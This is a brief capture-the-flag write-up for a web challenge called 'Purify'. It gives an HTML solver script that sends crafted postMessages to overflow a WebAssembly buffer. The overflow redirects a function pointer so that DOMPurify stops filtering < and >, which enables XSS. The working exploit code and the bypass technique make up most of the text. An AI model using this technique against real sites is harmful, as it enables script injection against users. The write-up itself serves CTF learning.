Tags: web
Rating:
Purify (web)
solver:
```html
<script>
  // open the target page, then send it a sequence of postMessages
  const i = open("http://web/");
  setTimeout(_ => {
    // oversized payload overflows the buffer (see the note below)
    i.postMessage("A".repeat(0x1000 - 2), "*");
    i.postMessage("\x01\x00\x00\x00", "*");
    i.postMessage("", "*");
    i.postMessage("", "*");
    i.postMessage("", "*");
    // debugging helper, left disabled:
    // setTimeout(() => {
    //   console.log(new Uint8Array(wasm.memory.buffer).toString());
    // }, 1000);
  }, 1500);
</script>
```
Roughly, the flow is this: a buffer overflow overwrites the function pointer that should reference `is_dangerous` so that it points to the `escape_attr` function instead. With that in place, DOMPurify only sanitizes the `"` and `'` characters, leaving `<` and `>` usable for XSS (Cross-Site Scripting).